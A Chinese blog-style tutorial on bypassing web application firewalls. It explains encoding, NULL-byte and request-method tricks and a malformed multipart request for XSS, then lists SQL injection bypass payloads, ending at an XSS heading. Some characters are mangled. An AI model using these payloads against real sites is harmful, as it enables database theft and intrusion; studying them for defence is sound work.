因工作原因研究了几天WAF绕过，简单分享下WAF绕过思路。

　　对一些攻击特征串进行不同的编码，如：URL编码，ASCII，Unicode.使用一些非标准的编码很容易就造成WAF BYPASS.

　　一些字符非标准的unicode码：

　　用NULL对数据截断，经测试发现，灵活使用NULL字节可以有效避开配置为阻止包含已知攻击字符串的请求的WAF。

　　有时，把使用GET方法的攻击转换成使用POST方法的攻击可能会避开某些过滤。许多应用程序在整个应用程序中执行某正常规过滤，阻止已知的攻击字符串。如果一个应用程序希望收到使用GET方法的请求，它能之对URL查询字符串执行这种过滤。将请求转换为使用POST就可以完全避开这种过滤。

　　看一个在没有正确解析HTTP Request数据包导致的WAF绕过，触发一个XSS：

　　POST /demo.php HTTP/1.0

　　Content-Type: multipart/form-data; boundary=0000

　　Content-Length: 97

　　–0000–

　　Content-Disposition: form-data; name=x’;filename=”‘;name=payload;”

　　–0000–

　　正常的HTTP应该是如下：

　　POST /demo.php HTTP/1.0

　　Content-Type: multipart/form-data; boundary=0000

　　Content-Length: 97

　　–0000–

　　Content-Disposition: form-data; name=”upfile”; filename=”payload”

　　–0000–

　　对比上面俩个HTTP头，给我们提供了WAF绕过的思路，修改攻击特征串或HTTP中的一细节，让WAF无法解析或者解析错误导致绕过。(许多WAF对无法解析的HTTP头，默认直接BYPASS)

　　罗列了一小部分的基本的绕过技巧(许多技巧因与工作相关无法分享，望见谅～^_^)。

　　这些技巧不一定能成功绕过WAF，但在许多场合下，通过一些基本技巧组合的使用，能提高绕过WAF的成功率，甚至完全BYPASS。

　　Sql Injection Bypass

　　大小写变种：

　　UnIon/**/sElEcT/**/1,2,3/**/fRoM/**/Users–

　　使用注释：

　　如上。在MySql中使用类似如下攻击依然有效：

　　‘/**/UN/**/ION/**/SEL/**/ECT/**/1,2,3/**/FROM/table–

　　内联内容(MySql Only)：

　　/*!UnIoN*/SeLecT+1,2,3–

　　/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()–

　　嵌套表达式：

　　UNunionION+SEselectLECT+1,2,3–

　　编码：

　　2次URL编码：

　　%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users–

　　ASCII:

　　“SELECT” ASCII Encode in databases.

　　MySql: char(83,69,76,69,67,84)

　　Oracle: chr(83)||chr(69)||chr(76)||chr(69)||chr(67)||chr(84)

　　Ms-Sql: char(chr(83)+chr(69)+chr(76)+chr(69)+chr(67)+chr(84))

　　使用空字节：

　　%00′ union+select+1,2,3–

　　uni%0bon+se%0blect+1,2,3–

　　参数污染(ASP/ASP.NET)：

　　id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

　　XSS Bypass：

　　脚本标签：